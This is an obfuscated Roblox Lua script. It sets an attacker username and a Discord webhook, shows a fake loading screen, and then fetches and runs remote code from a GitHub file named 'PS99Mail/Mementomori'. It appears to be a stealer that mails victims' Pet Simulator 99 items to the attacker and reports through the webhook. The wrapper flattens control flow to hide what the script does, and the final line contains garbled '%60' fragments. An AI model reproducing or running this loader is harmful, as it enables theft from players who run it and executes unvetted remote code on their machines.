--[[
 .                  __ .    __                           
 |    |     __   ___  \ |/ ___   __   /  |  __ 
 |    |   |  |  _  \   /   |   |  \   \  |  /  // \  \   /   _   \
 |    ||  |  //  _/    |    \ _\ \  | |  |  /_ \  _ /  |  | (  <> )  | /
 |__ _/(__  /___  /__  /| |__//__  >_  >__  /|  __/||
         /          /         /    /                /     /     /
          _Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;while true do if (v0==1) then while true do if (v1==0) then v2=0;while true do if (v2==0) then local v3=0;while true do if (v3==1) then v2=1;break;end if (v3==0) then local v6=0;while true do if (v6==1) then v3=1;break;end if (v6==0) then Username="Somerandomguy3077";Webhook="https://discord.com/api/webhooks/1213726397583986739/xeeN47zi3C30O2hpZk4ssaDYGK5eRyOnxAFBwS9I56MJTJaNDfaaeiMV3XUdTGD4QX21";v6=1;end end end end end if (v2==1) then local v4=0;local v5;while true do if (v4==0) then v5=0;while true do if (v5==1) then v2=2;break;end if (v5==0) then selectedLoadingScreen="4";LoadingScreen=true;v5=1;end end break;end end end if (v2==2) then((loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/PS99Mail/main/Mementomori"))()%60)%60)%60 break;end end break;end end break;end if (v0==0) then v1=0;v2=nil;v0=1;end end end
